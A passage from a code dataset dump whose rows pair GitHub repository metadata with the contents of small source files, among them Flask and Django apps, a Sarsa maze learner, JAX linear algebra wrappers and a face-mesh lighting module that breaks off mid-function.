blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2c67af0e6a0e47698557d1c16075616c11e7da42 | 1ec59e88299c7af9df3854188736b706e89e01fa | /app/forms/public/profile_forms.py | 1f3f68864842f4660895d45a56b96a51956c26cd | [] | no_license | Chenger1/NutCompany_FlaskApp | 7484b04721766b42f9cc909d11c3e942bf3b3371 | c51129e04f2c9e35263d9e28810b4c2862932ef6 | refs/heads/master | 2023-08-06T09:08:27.532820 | 2021-09-23T19:52:25 | 2021-09-23T19:52:25 | 405,457,276 | 0 | 0 | null | 2021-09-12T10:55:47 | 2021-09-11T18:44:35 | HTML | UTF-8 | Python | false | false | 1,241 | py | from flask_wtf import FlaskForm
from wtforms import StringField, SelectField
from wtforms.validators import Email, Optional
from ..custom_field import CustomFileField
from app._db.choices import CountryChoice
class ClientPersonalInfoForm(FlaskForm):
    """Client profile form: personal/contact details (field labels are in Russian)."""
    fio = StringField('ФИО', validators=[Optional()])  # full name
    email = StringField('Email', validators=[Optional(), Email()])
    phone = StringField('Телефон', validators=[Optional()])  # phone
    company = StringField('Компания', validators=[Optional()])  # company
    photo = CustomFileField('Фото', validators=[Optional()])  # profile photo upload
class ClientProfileAddressForm(FlaskForm):
    """Client profile form: two address blocks plus billing credentials.

    The ``_ur`` suffix presumably marks the legal/registered address
    (юридический адрес) - confirm against the templates that render it.
    """
    country = SelectField('Страна', choices=CountryChoice.choices(), coerce=CountryChoice.coerce)  # country
    city = StringField('Город', validators=[Optional()])  # city
    address = StringField('Адрес', validators=[Optional()])  # street address
    country_ur = SelectField('Страна', choices=CountryChoice.choices(), coerce=CountryChoice.coerce)
    city_ur = StringField('Город', validators=[Optional()])
    address_ur = StringField('Адрес', validators=[Optional()])
    index = StringField('Индекс', validators=[Optional()])  # postal code
    credentials = StringField('Реквизиты', validators=[Optional()])  # bank/company requisites
| [
"exs2199@gmail.com"
] | exs2199@gmail.com |
816e04e5d69c642ba2a24942f2af7ce25030a1a5 | 8c9402d753e36d39e0bef431c503cf3557b7e777 | /Sarsa_lambda_learning/main.py | e198580483ff22b2a9cc4c9141037276d21998a9 | [] | no_license | HuichuanLI/play_with_deep_reinforcement_learning | 9477e925f6ade81f885fb3f3b526485f49423611 | df2368868ae9489aff1be4ef0c6de057f094ef56 | refs/heads/main | 2023-07-08T04:52:38.167831 | 2021-08-21T14:05:36 | 2021-08-21T14:05:36 | 395,042,978 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # -*- coding:utf-8 -*-
# @Time : 2021/8/17 10:59 下午
# @Author : huichuan LI
# @File : main.py
# @Software: PyCharm
from maze import Maze
from Sara_Lambda import SarsaLambdaTable
def update():
    """Run 100 training episodes of Sarsa(lambda) on the maze environment."""
    for _ in range(100):
        # Reset the environment and pick the first action up front:
        # Sarsa is on-policy, so the action is chosen before stepping.
        state = env.reset()
        action = RL.choose_action(str(state))
        done = False
        while not done:
            env.render()
            # Step the environment, then choose the follow-up action so the
            # full (s, a, r, s', a') transition is available for learning.
            next_state, reward, done = env.step(action)
            next_action = RL.choose_action(str(next_state))
            RL.learn(str(state), action, reward, str(next_state), next_action)
            state, action = next_state, next_action
    # end of game
    print('game over')
    env.destroy()
if __name__ == "__main__":
    env = Maze()  # Tkinter-based maze environment
    RL = SarsaLambdaTable(actions=list(range(env.n_actions)))
    # Schedule training to start 100 ms after the GUI event loop begins.
    env.after(100, update)
    env.mainloop()
| [
"lhc14124908@163.com"
] | lhc14124908@163.com |
b29c5e65d26f5c8c0c9f722d200de823dcf5af31 | a478489da108ec850795ac24f798a0ac75bb4709 | /Standard_deviation-master/graphs/class1.py | d9180f882b2dbfe906f689b678c6b6f76b08ae4f | [
"MIT"
] | permissive | LiamBrower/Class-105 | 9ff0f54f98b3bc1a2e0b659cc67995a0b7b1c604 | 11b2aeaf8ad5836bd2da113261bbfb7abd52d441 | refs/heads/main | 2023-08-16T07:13:37.831836 | 2021-10-12T23:53:30 | 2021-10-12T23:53:30 | 416,531,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | import csv
with open(r'C:\Users\docto\Dropbox\WhiteHatJr\Class-105\Standard_deviation-master\graphs\class1.csv', newline='') as f:
reader = csv.reader(f)
file_data = list(reader)
#To remove headers from CSV
file_data.pop(0)
total_marks = 0
total_entries = len(file_data)
for marks in file_data:
total_marks += float(marks[1])
mean = total_marks / total_entries
print("Mean (Average) is -> "+str(mean))
import pandas as pd
import plotly.express as px
df = pd.read_csv("class1.csv")
fig = px.scatter(df, x="Student Number",
y="Marks"
)
fig.update_layout(shapes=[
dict(
type= 'line',
y0= mean, y1= mean,
x0= 0, x1= total_entries
)
])
fig.update_yaxes(rangemode="tozero")
fig.show()
| [
"noreply@github.com"
] | noreply@github.com |
80061a213c1bde5aef15c9b944e4fddf228b8218 | c95691559b7e94ccbd30d0295a852816bfd42f8a | /day25/day25.py | a48bdc73c07790270577bbe72ce4072fae2428da | [] | no_license | nsmryan/aoc2020 | 2fe515ca5f1db8711da00c9c921111d120d23b9f | a7810af1d2a0eff95d33da8d1378ba3b3a20b218 | refs/heads/master | 2023-02-03T05:32:08.817045 | 2020-12-25T14:54:21 | 2020-12-25T14:54:21 | 317,392,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | key1 = 8184785
key2 = 5293040
#key1 = 17807724
#key2 = 5764801
def step(value, subject):
    """One handshake round: multiply by the subject number modulo 20201227."""
    return value * subject % 20201227
def find_loop(key):
value = 1
loop_times = 0
while value != key:
value = step(value, 7)
loop_times += 1
return loop_times
# Recover each device's secret loop size from its public key.
loop1 = find_loop(key1)
print("loop size " + str(loop1))
loop2 = find_loop(key2)
print("loop size " + str(loop2))

# Encryption key = the other party's public key transformed loop-size times;
# both derivations below must print the same value.
result = 1
for _ in range(0, loop1):
    result = step(result, key2)
print(result)

result = 1
for _ in range(0, loop2):
    result = step(result, key1)
print(result)
| [
"nsmryan@gmail.com"
] | nsmryan@gmail.com |
bc03d8274188df69eac85d025d78dbfa59a16efd | 42321745dbc33fcf01717534f5bf7581f2dc9b3a | /lab/jax/linear_algebra.py | 618778d388a9415d7318fdcb5ef3dd6f36ac76e4 | [
"MIT"
] | permissive | talayCh/lab | 0a34b99fd60bc65fdfd1ead602d94dfb6b96f846 | 4ce49b68782a1ef8390b14ee61f57eeaa13070cf | refs/heads/master | 2023-08-25T04:42:06.904800 | 2021-11-01T18:22:00 | 2021-11-01T18:22:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | import logging
from typing import Union, Optional
import jax.numpy as jnp
import jax.scipy.linalg as jsla
from . import dispatch, B, Numeric
from .custom import jax_register
from ..custom import (
toeplitz_solve,
i_toeplitz_solve,
s_toeplitz_solve,
i_s_toeplitz_solve,
expm,
i_expm,
s_expm,
i_s_expm,
logm,
i_logm,
s_logm,
i_s_logm,
)
from ..linear_algebra import _default_perm
from ..types import Int
from ..util import batch_computation
__all__ = []
log = logging.getLogger(__name__)
@dispatch
def matmul(a: Numeric, b: Numeric, tr_a: bool = False, tr_b: bool = False):
    # Matrix product a @ b, optionally transposing either operand first.
    a = transpose(a) if tr_a else a
    b = transpose(b) if tr_b else b
    return jnp.matmul(a, b)
@dispatch
def transpose(a: Numeric, perm: Optional[Union[tuple, list]] = None):
    """Permute the axes of ``a``; with no ``perm``, the default permutation is used."""
    rank = B.rank(a)
    # A scalar is its own transpose.
    if rank == 0:
        return a
    # A vector with no explicit permutation becomes a 1 x n row matrix.
    if rank == 1 and perm is None:
        return a[None, :]
    axes = _default_perm(a) if perm is None else perm
    return jnp.transpose(a, axes=axes)
@dispatch
def trace(a: Numeric, axis1: Int = -2, axis2: Int = -1):
    # Sum along the diagonal of the plane spanned by the two given axes.
    return jnp.trace(a, axis1=axis1, axis2=axis2)
@dispatch
def svd(a: Numeric, compute_uv: bool = True):
    # Thin SVD; jnp returns Vh, so the third factor is conjugate-transposed
    # back to V before returning (U, S, V).
    res = jnp.linalg.svd(a, full_matrices=False, compute_uv=compute_uv)
    return (res[0], res[1], jnp.conj(transpose(res[2]))) if compute_uv else res
@dispatch
def eig(a: Numeric, compute_eigvecs: bool = True):
    # Eigendecomposition; eigenvectors are computed regardless but only
    # returned when requested.
    vals, vecs = jnp.linalg.eig(a)
    return (vals, vecs) if compute_eigvecs else vals
@dispatch
def solve(a: Numeric, b: Numeric):
    # Solve the linear system a x = b.
    return jnp.linalg.solve(a, b)
@dispatch
def inv(a: Numeric):
    # Matrix inverse.
    return jnp.linalg.inv(a)
@dispatch
def det(a: Numeric):
    # Matrix determinant.
    return jnp.linalg.det(a)
@dispatch
def logdet(a: Numeric):
    # log|det(a)|: slogdet returns (sign, logabsdet); the sign is discarded.
    return jnp.linalg.slogdet(a)[1]
# Matrix exponential, registered as a custom JAX op with its gradient rules.
_expm = jax_register(expm, i_expm, s_expm, i_s_expm)


@dispatch
def expm(a: Numeric):
    return _expm(a)
# Matrix logarithm, registered as a custom JAX op with its gradient rules.
_logm = jax_register(logm, i_logm, s_logm, i_s_logm)


@dispatch
def logm(a: Numeric):
    return _logm(a)
@dispatch
def _cholesky(a: Numeric):
    # Lower-triangular Cholesky factor of ``a``.
    return jnp.linalg.cholesky(a)
@dispatch
def cholesky_solve(a: Numeric, b: Numeric):
    # Solve (a a^T) x = b given the lower Cholesky factor ``a`` via two
    # triangular solves: first with a (lower), then with a^T (upper).
    return triangular_solve(transpose(a), triangular_solve(a, b), lower_a=False)
@dispatch
def triangular_solve(a: Numeric, b: Numeric, lower_a: bool = True):
    # Triangular solve, batched: batch_computation maps the scalar solve over
    # leading batch dimensions, treating the last two axes as the matrices.
    def _triangular_solve(a_, b_):
        return jsla.solve_triangular(
            a_, b_, trans="N", lower=lower_a, check_finite=False
        )

    return batch_computation(_triangular_solve, (a, b), (2, 2))
# Toeplitz solve, registered as a custom JAX op with its gradient rules.
_toeplitz_solve = jax_register(
    toeplitz_solve, i_toeplitz_solve, s_toeplitz_solve, i_s_toeplitz_solve
)


@dispatch
def toeplitz_solve(a: Numeric, b: Numeric, c: Numeric):
    return _toeplitz_solve(a, b, c)
| [
"wessel.p.bruinsma@gmail.com"
] | wessel.p.bruinsma@gmail.com |
5be75593b7002ffbd31b4897bca03ea2ca701912 | cb938bb6201fb7ec3611623b54682a2252a0fc32 | /stud_comms/urls.py | 179f878fc5543e3e915ec1f32679e4628bab1528 | [] | no_license | JonoCX/2015-placement | 35e6ca11dac3841fcf785b4a787a5aadf403e5af | 385d70911cbc70cd9e030665caae44aa4504a685 | refs/heads/master | 2021-01-10T16:39:53.242741 | 2015-11-09T15:01:27 | 2015-11-09T15:01:27 | 45,845,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
from core.views import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'stud_comms.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^$', views.login, name='login'),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^comms-system/', include('core.urls')),
    # Django's default login URL is pointed at the custom login view.
    url(r'^accounts/login/', views.login),
)

# Precaution; if debug is left on
# NOTE(review): document_root is set to STATIC_URL here; serving static files
# usually expects STATIC_ROOT (a filesystem path) - confirm this is intended.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_URL)
"j.carlton@newcastle.ac.uk"
] | j.carlton@newcastle.ac.uk |
6d1251f96e95ba1a11e3cc90efb4ac438f43f3c2 | 2fc85575c373c9cd404b7a824e751ea984cbd1b9 | /ingredients/migrations/0001_initial.py | 547306c5c3d609a677c616c9fadc6cff85181ea3 | [] | no_license | ildecarz/bigbox | 3fd46e194346a10907fa33106e76df05b92bd7df | be45180fd979344b5412586cc92f13a331a2a8ad | refs/heads/main | 2023-05-05T21:23:53.353828 | 2021-05-28T13:55:52 | 2021-05-28T13:55:52 | 361,298,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | # Generated by Django 2.2 on 2021-05-19 20:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations (see header); avoid hand-editing.

    initial = True

    dependencies = [
    ]

    # Creates the Category table and the Ingredient table, with Ingredient
    # holding a cascading foreign key to its Category.
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Ingredient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('notes', models.TextField()),
                ('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ingredients', to='ingredients.Category')),
            ],
        ),
    ]
| [
"ildemarocarrasco@gmail.com"
] | ildemarocarrasco@gmail.com |
91e562078bece0259cf7a8eeb1a9714d1804c552 | 5d8c3150f28ab998326e38f1da420eb4e8d946c6 | /app.py | 7fd829b831371a7fdfadebdd9b241882fd616fac | [] | no_license | hoon0624/garbage-classification-heroku | 6bb587704a38a18c9a65735c4eb84e3b1db116bc | e3f2d1535db9097cfb2f0d5ca42230ed3566e889 | refs/heads/master | 2023-05-13T08:33:40.825155 | 2020-04-14T17:38:17 | 2020-04-14T17:38:17 | 254,552,658 | 4 | 3 | null | 2023-05-01T21:37:48 | 2020-04-10T05:35:52 | Jupyter Notebook | UTF-8 | Python | false | false | 1,649 | py | from __future__ import division, print_function
# coding=utf-8
import sys
import os
import glob
import re
from pathlib import Path
# Import fast.ai Library
from fastai import *
from fastai.vision import *
# Flask utils
from flask import Flask, redirect, url_for, request, render_template
from werkzeug.utils import secure_filename
# Define a flask app
app = Flask(__name__)

# Classifier setup: the six garbage categories and the trained fastai learner.
path = Path("path")
classes = ['cardboard', 'glass', 'metal', 'paper', 'plastic', 'trash']
# deprecated; use DataBunch.load_empty
data2 = ImageDataBunch.single_from_classes(path, classes, ds_tfms=get_transforms(), size=224).normalize(imagenet_stats)
# learn = create_cnn(data2, models.resnet34)
# learn.load('model_9086')
path1 = Path("./path/models")
# Load the exported model from ./path/models/export.pkl.
learn = load_learner(path1, 'export.pkl')
def model_predict(img_path):
    """Open the image at ``img_path`` and return the learner's predicted class."""
    image = open_image(img_path)
    # learn.predict yields (class, class index, raw outputs); only the class
    # label is needed here.
    predicted_class, _, _ = learn.predict(image)
    return predicted_class
@app.route('/', methods=['GET'])
def index():
    """Render the upload page."""
    # Main page
    return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def upload():
    """Accept an uploaded image, classify it, and return the label as text.

    NOTE(review): a GET request falls through to ``return None``, which Flask
    rejects with a 500 error - confirm whether GET should render something.
    """
    if request.method == 'POST':
        # Get the file from post request
        f = request.files['file']

        # Save the file to ./uploads (kept on disk; no cleanup is performed)
        basepath = os.path.dirname(__file__)
        file_path = os.path.join(
            basepath, 'uploads', secure_filename(f.filename))
        f.save(file_path)

        # Make prediction
        preds = model_predict(file_path)
        preds = str(preds)
        return preds
    return None
if __name__ == '__main__':
    # Run the Flask development server with default host/port settings.
    app.run()
"donghoon.lee@mail.mcgill.ca"
] | donghoon.lee@mail.mcgill.ca |
cb1b09b13545f6e89fee158e5b5e37ee7d392d73 | 59366342805d7b7682a8c45fd5c11b910e791c21 | /L8包/package/pack1/py1.py | b0fd52ca063138c053548e40274a039e81ea139e | [] | no_license | wantwantwant/tutorial | dad006b5c9172b57c53f19d8229716f1dec5ccd1 | 8d400711ac48212e6992cfd187ee4bfb3642f637 | refs/heads/master | 2022-12-29T05:41:12.485718 | 2019-01-07T08:28:33 | 2019-01-07T08:28:33 | 171,679,026 | 2 | 0 | null | 2022-12-08T01:21:22 | 2019-02-20T13:33:42 | Python | UTF-8 | Python | false | false | 214 | py | def foo():
# 假设代表一些逻辑处理
print('foo')
def boo():
print('boo')
# 单脚本的时候,调用方法
foo()
boo()
print(__name__)
#
# if __name__ =='__main__':
# foo()
# boo()
| [
"778042395@qq.com"
] | 778042395@qq.com |
83416776a453799aedb29e38b0934f13e88a005a | c49e1cf78851aec6b3df5b4774d16020e919ed65 | /server/server/urls.py | d8c5d72f20c89ab8c18390b24afdb2f68626b3fe | [] | no_license | weeksling/product-tracking-portal | 5c3e41ae773f49440ff74adc4d3352133fe9485a | 4f10c573a18eeac19d6aed3bf3008d180ccb0a07 | refs/heads/master | 2021-01-06T20:35:14.141517 | 2017-08-13T23:30:39 | 2017-08-13T23:30:39 | 99,381,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # REST API lives under /api/; the browsable-API login under /api-auth/.
    url(r'^api/', include('api.urls', namespace='api', app_name='api')),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
"weeksling@gmail.com"
] | weeksling@gmail.com |
35da58bdb8be02fba0f38d7f0bb56498199a2c1a | b090cb9bc30ac595675d8aa253fde95aef2ce5ea | /trunk/test/NightlyRun/test304.py | 73f9108132ad2bddc032b4278bf438f74d72234c | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | eyhl/issm | 5ae1500715c258d7988e2ef344c5c1fd15be55f7 | 1013e74c28ed663ebb8c9d398d9be0964d002667 | refs/heads/master | 2022-01-05T14:31:23.235538 | 2019-01-15T13:13:08 | 2019-01-15T13:13:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | #Test Name: SquareSheetConstrainedStressSSA3d
from model import *
from socket import gethostname
from triangle import *
from setmask import *
from parameterize import *
from setflowequation import *
from solve import *
# Build a square ice-sheet mesh, extrude it to 3-D, and solve the SSA
# stress balance on 3 processes on the local machine.
md=triangle(model(),'../Exp/Square.exp',180000.)
md=setmask(md,'','')
md=parameterize(md,'../Par/SquareSheetConstrained.py')
md.extrude(3,2.)
md=setflowequation(md,'SSA','all')
md.cluster=generic('name',gethostname(),'np',3)
md=solve(md,'Stressbalance')

#Fields and tolerances to track changes
field_names     =['Vx','Vy','Vz','Vel','Pressure']
field_tolerances=[1e-13,1e-13,1e-13,1e-13,1e-13]
field_values=[\
    md.results.StressbalanceSolution.Vx,\
    md.results.StressbalanceSolution.Vy,\
    md.results.StressbalanceSolution.Vz,\
    md.results.StressbalanceSolution.Vel,\
    md.results.StressbalanceSolution.Pressure,\
    ]
| [
"cummings.evan@gmail.com"
] | cummings.evan@gmail.com |
ca46b5a2afb0afc86c6767c17a30760e6a097ebe | af46ef78a8e680733efa0056e0388db529a523a3 | /list/is_instance.py | 4a52a23d6b36f6cba7246bfc4960f42ebeba6397 | [] | no_license | mjhea0/python-basic-examples | 90f3aa1cb1a1399a7fe7b1b7e07cced517433490 | aaf4a5458f3e016703b6677033ea17b9cc901596 | refs/heads/master | 2021-01-15T18:31:28.455291 | 2013-09-21T03:59:23 | 2013-09-21T03:59:23 | 13,141,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #coding:utf-8
# NOTE: Python 2 syntax (print statements, basestring); will not run on Python 3.
numList = [2000, 2003, 2005, 2006]
stringList = ["Essential", "Python", "Code"]
mixedList = [1, 2, "three", 4]
subList = ["A", "B", ["C", 2006]]
listList = [numList, stringList, mixedList, subList]

# Walk each element of every sub-list and dispatch on its runtime type;
# nested lists (e.g. ["C", 2006] inside subList) match neither branch.
for x in listList:
    for y in x:
        if isinstance(y, int):
            print y + 1
        if isinstance(y, basestring):
            print "String:" + y
| [
"wang.bo@okcash.cn"
] | wang.bo@okcash.cn |
e095364f26d4002c10f2091881651d28c6288ec2 | d732fb0d57ec5430d7b15fd45074c555c268e32c | /misc/config_files/read_config_1.py | 7778e50073f61ca9d0f99726798d819291ac18a6 | [] | no_license | askobeldin/mypython3 | 601864997bbebdabb10809befd451490ffd37625 | 8edf58311a787f9a87330409d9734370958607f1 | refs/heads/master | 2020-04-12T08:01:16.893234 | 2018-02-01T18:23:23 | 2018-02-01T18:23:23 | 60,504,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
#
################################################################################
from configparser import ConfigParser, ExtendedInterpolation
import re
import myutils
parser = ConfigParser(interpolation=ExtendedInterpolation(), strict=True)
# Override the section-header regex to tolerate spaces inside the brackets,
# e.g. "[ section ]".
parser.SECTCRE = re.compile(r"\[ *(?P<header>[^]]+?) *\]")

with open('config1.cfg', encoding='utf-8') as f:
    parser.read_file(f)

myutils.showconfig1(parser)
| [
"askobeldin@gmail.com"
] | askobeldin@gmail.com |
dffff54fdbcd023f7ce8038ad836b2214eb95f3d | 4b4147ca5ad3cf6bd0235263fe8ec279d4ac4cc9 | /face3d/face3d/mesh_numpy/light.py | becc5fbc757e9f4ebe9cf39a03c07522c24a1b13 | [
"MIT"
] | permissive | weepiess/PRnet-train | e7d9f2ac75a977d5b25bac6bd50aa6d840a666ec | 16631e71623a1fbb7acf09d183ab460d0467564b | refs/heads/master | 2022-09-02T06:17:02.633333 | 2020-05-20T17:07:02 | 2020-05-20T17:07:02 | 259,006,451 | 1 | 0 | MIT | 2020-05-09T10:44:35 | 2020-04-26T10:51:44 | Python | UTF-8 | Python | false | false | 7,717 | py | '''
Functions about lighting mesh(changing colors/texture of mesh).
1. add light to colors/texture (shade each vertex)
2. fit light according to colors/texture & image.
Preparation knowledge:
lighting: https://cs184.eecs.berkeley.edu/lecture/pipeline
spherical harmonics in human face: '3D Face Reconstruction from a Single Image Using a Single Reference Face Shape'
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
def get_normal(vertices, triangles):
    ''' calculate normal direction in each vertex
    Args:
        vertices: [nver, 3]
        triangles: [ntri, 3]
    Returns:
        normal: [nver, 3] unit vertex normals; vertices in no triangle (or with
            cancelling triangle normals) get [1, 0, 0].
    '''
    pt0 = vertices[triangles[:, 0], :] # [ntri, 3]
    pt1 = vertices[triangles[:, 1], :] # [ntri, 3]
    pt2 = vertices[triangles[:, 2], :] # [ntri, 3]
    tri_normal = np.cross(pt0 - pt1, pt0 - pt2) # [ntri, 3]. normal of each triangle

    # Accumulate each triangle's normal onto its three corner vertices.
    # np.add.at is an unbuffered scatter-add, so repeated vertex indices are
    # summed correctly; this replaces the original per-triangle Python loop.
    normal = np.zeros_like(vertices) # [nver, 3]
    for corner in range(3):
        np.add.at(normal, triangles[:, corner], tri_normal)

    # normalize to unit length
    mag = np.sum(normal**2, 1) # [nver]
    zero_ind = (mag == 0)
    mag[zero_ind] = 1
    normal[zero_ind, 0] = np.ones((np.sum(zero_ind)))

    normal = normal/np.sqrt(mag[:,np.newaxis])
    return normal
# TODO: test
def add_light_sh(vertices, triangles, colors, sh_coeff):
    '''
    In 3d face, usually assume:
    1. The surface of face is Lambertian(reflect only the low frequencies of lighting)
    2. Lighting can be an arbitrary combination of point sources
    --> can be expressed in terms of spherical harmonics(omit the lighting coefficients)
    I = albedo * (sh(n) x sh_coeff)

    albedo: n x 1
    sh_coeff: 9 x 1
    Y(n) = (1, n_x, n_y, n_z, n_xn_y, n_xn_z, n_yn_z, n_x^2 - n_y^2, 3n_z^2 - 1)': n x 9
    # Y(n) = (1, n_x, n_y, n_z)': n x 4

    Args:
        vertices: [nver, 3]
        triangles: [ntri, 3]
        colors: [nver, 3] albedo
        sh_coeff: [9, 1] spherical harmonics coefficients

    Returns:
        lit_colors: [nver, 3]
    '''
    assert vertices.shape[0] == colors.shape[0]
    nver = vertices.shape[0]
    # Fix: the original assigned the normals to ``normal`` but evaluated the
    # basis on an undefined name ``n`` (NameError); bind the normals to ``n``.
    n = get_normal(vertices, triangles) # [nver, 3]
    # Fix: np.array over 9 per-vertex rows yields shape [9, nver]; transpose to
    # the documented [nver, 9] so sh.dot(sh_coeff) gives an [nver, 1] irradiance.
    sh = np.array((np.ones(nver), n[:,0], n[:,1], n[:,2], n[:,0]*n[:,1], n[:,0]*n[:,2], n[:,1]*n[:,2], n[:,0]**2 - n[:,1]**2, 3*(n[:,2]**2) - 1)).T # [nver, 9]
    ref = sh.dot(sh_coeff) #[nver, 1]
    lit_colors = colors*ref
    return lit_colors
def add_light(vertices, triangles, colors, light_positions = 0, light_intensities = 0):
    ''' Gouraud shading. add point lights.
    In 3d face, usually assume:
    1. The surface of face is Lambertian(reflect only the low frequencies of lighting)
    2. Lighting can be an arbitrary combination of point sources
    3. No specular (unless skin is oil, 23333)

    Ref: https://cs184.eecs.berkeley.edu/lecture/pipeline
    Args:
        vertices: [nver, 3]
        triangles: [ntri, 3]
        light_positions: [nlight, 3]
        light_intensities: [nlight, 3]
    Returns:
        lit_colors: [nver, 3]
    '''
    nver = vertices.shape[0]
    normals = get_normal(vertices, triangles) # [nver, 3]

    # ambient
    # La = ka*Ia

    # diffuse
    # Ld = kd*(I/r^2)max(0, nxl)
    # NOTE(review): despite its name this vector points from each light toward
    # each vertex, and no inverse-square (1/r^2) falloff is applied - the
    # unit-direction dot product is used directly.
    direction_to_lights = vertices[np.newaxis, :, :] - light_positions[:, np.newaxis, :] # [nlight, nver, 3]
    direction_to_lights_n = np.sqrt(np.sum(direction_to_lights**2, axis = 2)) # [nlight, nver]
    direction_to_lights = direction_to_lights/direction_to_lights_n[:, :, np.newaxis]
    normals_dot_lights = normals[np.newaxis, :, :]*direction_to_lights # [nlight, nver, 3]
    normals_dot_lights = np.sum(normals_dot_lights, axis = 2) # [nlight, nver]
    # Sum each light's contribution: albedo * (n . l) * intensity.
    diffuse_output = colors[np.newaxis, :, :]*normals_dot_lights[:, :, np.newaxis]*light_intensities[:, np.newaxis, :]
    diffuse_output = np.sum(diffuse_output, axis = 0) # [nver, 3]

    # specular
    # h = (v + l)/(|v + l|) bisector
    # Ls = ks*(I/r^2)max(0, nxh)^p
    # increasing p narrows the reflectionlob

    lit_colors = diffuse_output # only diffuse part here.
    # Clamp the shaded colors into the valid [0, 1] range.
    lit_colors = np.minimum(np.maximum(lit_colors, 0), 1)
    return lit_colors
## TODO. estimate light(sh coeff)
## -------------------------------- estimate. can not use now.
def fit_light(image, vertices, colors, triangles, vis_ind, lamb = 10, max_iter = 3):
    """Estimate per-channel spherical-harmonic lighting from an image.

    NOTE(review): this function references a name ``texture`` that is never
    defined in this scope (presumably the ``colors`` argument) and so raises
    NameError as written - confirm before use. It also indexes ``vertices`` as
    [3 x nver] (``vertices[:2, :]``, ``shape[1]``), the transpose of the
    [nver x 3] layout used by get_normal/add_light in this module.
    """
    [h, w, c] = image.shape
    # surface normal
    norm = get_normal(vertices, triangles)

    nver = vertices.shape[1]

    # vertices --> corresponding image pixel
    pt2d = vertices[:2, :]

    # Clamp projected points to the image bounds before sampling pixels.
    pt2d[0,:] = np.minimum(np.maximum(pt2d[0,:], 0), w - 1)
    pt2d[1,:] = np.minimum(np.maximum(pt2d[1,:], 0), h - 1)
    pt2d = np.round(pt2d).astype(np.int32) # 2 x nver

    image_pixel = image[pt2d[1,:], pt2d[0,:], :] # nver x 3
    image_pixel = image_pixel.T # 3 x nver

    # vertices --> corresponding mean texture pixel with illumination
    # Spherical Harmonic Basis (9 terms, evaluated at each vertex normal)
    harmonic_dim = 9
    nx = norm[0,:];
    ny = norm[1,:];
    nz = norm[2,:];
    harmonic = np.zeros((nver, harmonic_dim))

    pi = np.pi
    harmonic[:,0] = np.sqrt(1/(4*pi)) * np.ones((nver,));
    harmonic[:,1] = np.sqrt(3/(4*pi)) * nx;
    harmonic[:,2] = np.sqrt(3/(4*pi)) * ny;
    harmonic[:,3] = np.sqrt(3/(4*pi)) * nz;
    harmonic[:,4] = 1/2. * np.sqrt(3/(4*pi)) * (2*nz**2 - nx**2 - ny**2);
    harmonic[:,5] = 3 * np.sqrt(5/(12*pi)) * (ny*nz);
    harmonic[:,6] = 3 * np.sqrt(5/(12*pi)) * (nx*nz);
    harmonic[:,7] = 3 * np.sqrt(5/(12*pi)) * (nx*ny);
    harmonic[:,8] = 3/2. * np.sqrt(5/(12*pi)) * (nx*nx - ny*ny);

    '''
    I' = sum(albedo * lj * hj) j = 0:9 (albedo = tex)
    set A = albedo*h (n x 9)
        alpha = lj (9 x 1)
        Y = I (n x 1)
        Y' = A.dot(alpha)

    opt function:
